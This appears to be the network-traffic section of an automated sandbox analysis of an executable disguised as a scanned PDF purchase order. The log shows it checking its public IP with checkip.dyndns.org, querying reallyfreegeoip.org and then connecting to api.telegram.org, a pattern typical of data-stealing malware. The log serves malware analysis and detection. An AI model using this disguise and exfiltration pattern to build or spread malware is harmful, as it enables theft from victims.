Oct 25, 2024 09:17:18.156270027 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.159534931 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:18.159580946 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.300853968 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.300935984 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.300986052 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:18.301647902 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:18.306490898 CEST	49726	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.311816931 CEST	80	49726	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:18.311963081 CEST	49726	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.312068939 CEST	49726	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.317395926 CEST	80	49726	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:18.530312061 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.533183098 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:18.533206940 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.681618929 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.681737900 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:18.681808949 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:18.682441950 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:18.686093092 CEST	49723	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.687479973 CEST	49727	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.692038059 CEST	80	49723	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:18.692095995 CEST	49723	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.692842960 CEST	80	49727	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:18.692938089 CEST	49727	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.693051100 CEST	49727	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:18.698818922 CEST	80	49727	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:19.176733971 CEST	80	49726	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:19.178731918 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:19.178776026 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:19.178833008 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:19.179248095 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:19.179256916 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:19.220365047 CEST	49726	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:19.559221983 CEST	80	49727	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:19.560959101 CEST	49729	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:19.561013937 CEST	443	49729	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:19.561130047 CEST	49729	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:19.561419010 CEST	49729	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:19.561433077 CEST	443	49729	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:19.611042023 CEST	49727	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.686038971 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.691013098 CEST	443	49729	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.692346096 CEST	49729	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:20.692363977 CEST	443	49729	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.693439007 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:20.693458080 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.831059933 CEST	443	49729	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.831355095 CEST	443	49729	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.831417084 CEST	49729	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:20.832289934 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.832381964 CEST	443	49728	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:20.832437038 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:20.839875937 CEST	49729	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:20.843229055 CEST	49728	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:20.897531033 CEST	49730	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.899091959 CEST	49731	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.899235964 CEST	49726	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.903156042 CEST	80	49730	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:20.903278112 CEST	49730	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.903827906 CEST	49730	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.904495001 CEST	80	49731	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:20.904550076 CEST	49731	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.904635906 CEST	49731	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.905114889 CEST	80	49726	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:20.905169010 CEST	49726	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:20.909363985 CEST	80	49730	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:20.909940958 CEST	80	49731	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:21.771253109 CEST	80	49730	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:21.773571014 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:21.773622036 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:21.773749113 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:21.774054050 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:21.774066925 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:21.776822090 CEST	80	49731	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:21.778155088 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:21.778202057 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:21.778309107 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:21.778609037 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:21.778629065 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:21.814244032 CEST	49730	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:21.829725981 CEST	49731	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.388434887 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.390177011 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.390733957 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:22.390762091 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.391556978 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:22.391594887 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.529524088 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.529627085 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.529690981 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:22.530364037 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:22.535207987 CEST	49731	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.536427021 CEST	49734	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.537859917 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.537976980 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:22.538027048 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:22.538506985 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:22.541085958 CEST	80	49731	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:22.541141987 CEST	49731	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.541780949 CEST	80	49734	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:22.541847944 CEST	49734	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.541937113 CEST	49734	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.542088985 CEST	49730	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.543240070 CEST	49735	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.547426939 CEST	80	49734	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:22.548635960 CEST	80	49735	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:22.548727036 CEST	49735	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.548870087 CEST	49735	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.549093008 CEST	80	49730	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:22.549144983 CEST	49730	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:22.554625988 CEST	80	49735	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:23.404171944 CEST	80	49734	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:23.404201031 CEST	80	49735	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:23.445411921 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:23.445513964 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:23.445600033 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:23.445899963 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:23.445929050 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:23.454703093 CEST	49734	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:23.454766989 CEST	49735	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:23.514265060 CEST	49738	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:23.514307976 CEST	443	49738	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:23.514379025 CEST	49738	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:23.515372038 CEST	49738	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:23.515381098 CEST	443	49738	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.064121962 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.065850973 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:24.065934896 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.117674112 CEST	443	49738	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.121347904 CEST	49738	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:24.121402979 CEST	443	49738	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.208235025 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.208400965 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.208456993 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:24.209054947 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:24.213226080 CEST	49735	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.214536905 CEST	49740	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.219789982 CEST	80	49735	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:24.219837904 CEST	49735	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.220060110 CEST	80	49740	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:24.220211029 CEST	49740	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.220299006 CEST	49740	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.225682020 CEST	80	49740	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:24.257575989 CEST	443	49738	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.257812023 CEST	443	49738	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:24.257879972 CEST	49738	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:24.258403063 CEST	49738	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:24.262218952 CEST	49734	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.263472080 CEST	49741	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.269089937 CEST	80	49741	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:24.269217968 CEST	49741	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.269227028 CEST	80	49734	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:24.269269943 CEST	49734	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.269423008 CEST	49741	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:24.274941921 CEST	80	49741	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:25.083581924 CEST	80	49740	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:25.084914923 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.084960938 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.085037947 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.085382938 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.085393906 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.126600027 CEST	49740	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.158359051 CEST	80	49741	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:25.160063982 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.160131931 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.160207033 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.160590887 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.160609007 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.204696894 CEST	49741	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.693424940 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.695219040 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.695245028 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.773699045 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.775454998 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.775484085 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.836361885 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.836452007 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.839772940 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.843497038 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.863737106 CEST	49740	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.869599104 CEST	80	49740	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:25.869777918 CEST	49740	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.872375011 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:25.872416019 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:25.872564077 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:25.886003017 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:25.886024952 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:25.917073011 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.917330980 CEST	443	49745	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:25.917643070 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.918256044 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:25.921366930 CEST	49741	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.922641993 CEST	49748	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.927186012 CEST	80	49741	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:25.927293062 CEST	49741	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.928041935 CEST	80	49748	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:25.928206921 CEST	49748	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.928317070 CEST	49748	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:25.934326887 CEST	80	49748	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:26.713875055 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:26.715198040 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:26.719244957 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:26.719269037 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:26.719633102 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:26.730276108 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:26.775341034 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:26.800252914 CEST	80	49748	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:26.802500010 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:26.802541971 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:26.802618980 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:26.803078890 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:26.803091049 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:26.845325947 CEST	49748	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:26.966129065 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:26.966217995 CEST	443	49747	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:26.966281891 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:26.970279932 CEST	49747	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:27.416409969 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:27.428077936 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:27.428123951 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:27.564985991 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:27.565220118 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:27.565285921 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:27.566137075 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:27.569397926 CEST	49748	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:27.569993973 CEST	49750	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:27.575146914 CEST	80	49748	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:27.575489998 CEST	80	49750	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:27.575551987 CEST	49748	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:27.575589895 CEST	49750	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:27.575687885 CEST	49750	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:27.583266020 CEST	80	49750	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:28.658778906 CEST	80	49750	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:28.660491943 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:28.660525084 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:28.660604000 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:28.660914898 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:28.660926104 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:28.669812918 CEST	80	49750	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:28.669882059 CEST	49750	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:29.279969931 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:29.282360077 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:29.282387972 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:29.437994957 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:29.438112974 CEST	443	49751	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:29.438162088 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:29.438749075 CEST	49751	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:29.448277950 CEST	49750	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:29.449228048 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:29.449270010 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:29.449361086 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:29.449816942 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:29.449836969 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:29.454113960 CEST	80	49750	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:29.454185009 CEST	49750	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:30.286726952 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:30.286830902 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:30.288477898 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:30.288492918 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:30.288731098 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:30.290026903 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:30.331336975 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:30.533940077 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:30.534030914 CEST	443	49752	149.154.167.220	192.168.2.8
Oct 25, 2024 09:17:30.534112930 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:30.536622047 CEST	49752	443	192.168.2.8	149.154.167.220
Oct 25, 2024 09:17:32.498955011 CEST	49727	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:35.713732958 CEST	49722	80	192.168.2.8	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 09:17:10.037425041 CEST	59304	53	192.168.2.8	1.1.1.1
Oct 25, 2024 09:17:10.045856953 CEST	53	59304	1.1.1.1	192.168.2.8
Oct 25, 2024 09:17:11.603241920 CEST	54936	53	192.168.2.8	1.1.1.1
Oct 25, 2024 09:17:11.614094973 CEST	53	54936	1.1.1.1	192.168.2.8
Oct 25, 2024 09:17:25.863738060 CEST	51096	53	192.168.2.8	1.1.1.1
Oct 25, 2024 09:17:25.871476889 CEST	53	51096	1.1.1.1	192.168.2.8
Oct 25, 2024 09:17:38.268932104 CEST	50723	53	192.168.2.8	1.1.1.1
Oct 25, 2024 09:17:38.276360035 CEST	53	50723	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 25, 2024 09:17:10.037425041 CEST	192.168.2.8	1.1.1.1	0xcd17	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:11.603241920 CEST	192.168.2.8	1.1.1.1	0xfc45	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:25.863738060 CEST	192.168.2.8	1.1.1.1	0xd2e5	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:38.268932104 CEST	192.168.2.8	1.1.1.1	0x97c3	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 25, 2024 09:17:10.045856953 CEST	1.1.1.1	192.168.2.8	0xcd17	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 25, 2024 09:17:10.045856953 CEST	1.1.1.1	192.168.2.8	0xcd17	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:10.045856953 CEST	1.1.1.1	192.168.2.8	0xcd17	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:10.045856953 CEST	1.1.1.1	192.168.2.8	0xcd17	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:10.045856953 CEST	1.1.1.1	192.168.2.8	0xcd17	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:10.045856953 CEST	1.1.1.1	192.168.2.8	0xcd17	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:11.614094973 CEST	1.1.1.1	192.168.2.8	0xfc45	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:11.614094973 CEST	1.1.1.1	192.168.2.8	0xfc45	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:25.871476889 CEST	1.1.1.1	192.168.2.8	0xd2e5	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 25, 2024 09:17:38.276360035 CEST	1.1.1.1	192.168.2.8	0x97c3	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	132.226.247.73	80	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:17:10.061732054 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 09:17:10.927773952 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 39bea8a4733d031e477dfc900f5ecb3b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 09:17:10.935897112 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
